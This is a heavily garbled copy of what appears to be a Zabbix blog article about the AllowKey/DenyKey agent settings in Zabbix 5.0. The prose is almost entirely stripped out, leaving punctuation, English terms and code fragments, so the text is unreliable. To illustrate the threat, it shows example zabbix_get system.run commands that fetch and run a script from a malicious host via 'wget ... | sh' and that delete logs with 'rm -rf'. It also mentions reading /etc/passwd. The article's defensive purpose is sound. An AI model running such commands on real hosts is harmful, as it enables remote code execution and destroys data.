Support for black and white lists for metrics on the agent side
Tikhon Uskov , Integration Engineer, Zabbix
Data security concerns
Zabbix 5.0 introduces a new feature that improves security on systems using Zabbix Agent and replaces the old EnableRemoteCommands parameter .
, .
- , , , , .
, zabbix_get , , . .
zabbix_get
. , . , , /etc/passwd/ .
- . , *system.run[]** , - Zabbix , .
# zabbix_get -s my.prod.host -k system.run["wget http://malicious_source -O- | sh"]
# zabbix_get -s my.prod.host -k system.run["rm -rf /var/log/applog/"]- Linux root-, Windows System . , Zabbix Agent , , WMI .
EnableRemoteCommands=0 *system.run[]** -, , , , .
EnableRemoteCommand Zabbix
AllowKey/DenyKey
Zabbix 5.0 .
Zabbix 5.0 , *system.run[]**, , :
AllowKey= โ ;
DenyKey= โ ;
โ , (*).
AllowKey DenyKey . AllowKey/DenyKey . , โ , .
, . , , . , .
, , , .
2 vfs.file.size[/tmp/file]
AllowKey/DenyKey:
- ,
- ,
- .
, , , , . , .
2 *system.run[]**, , , , .
โ (wildcard). (*) . , . , , wildcard.
[].
system.run[*โvfs.file*.txt]โvfs.file.*[*]โ
wildcard.
- . , , , .
- , , .
- , wildcard, , . . .
.
- , . . - , โ .
- , , . , CPU , system.cpu.load[*] , , .
- , , (discovery) . AllowKey/DenyKey :
โ HostnameItem
โ HostMetadataItem
โ HostInterfaceItem
. - , Zabbix , 'NOTSUPPORTED'. log- . , , - .
- - (, ).
, .
:
- Zabbix.
- zabbix_agentd. Zabbix agent c -print (-p) ( ), , . -test (-t) 'Unsupported item key'.
- zabbix_get. zabbix_get -k 'ZBX_NOTSUPPORTED: Unknown metric'.
, , zabbix_get, .
**
. .
. , .
, .
. , ? , , , Zabbix?
. regex, , , , . Regex โ , . Wildcards โ , .
. Include ?
. , , , . AllowKey/DenyKey Include, , .
. Zabbix 5.0 'EnableRemoteCommands=' , AllowKey/DenyKey?
. , .
!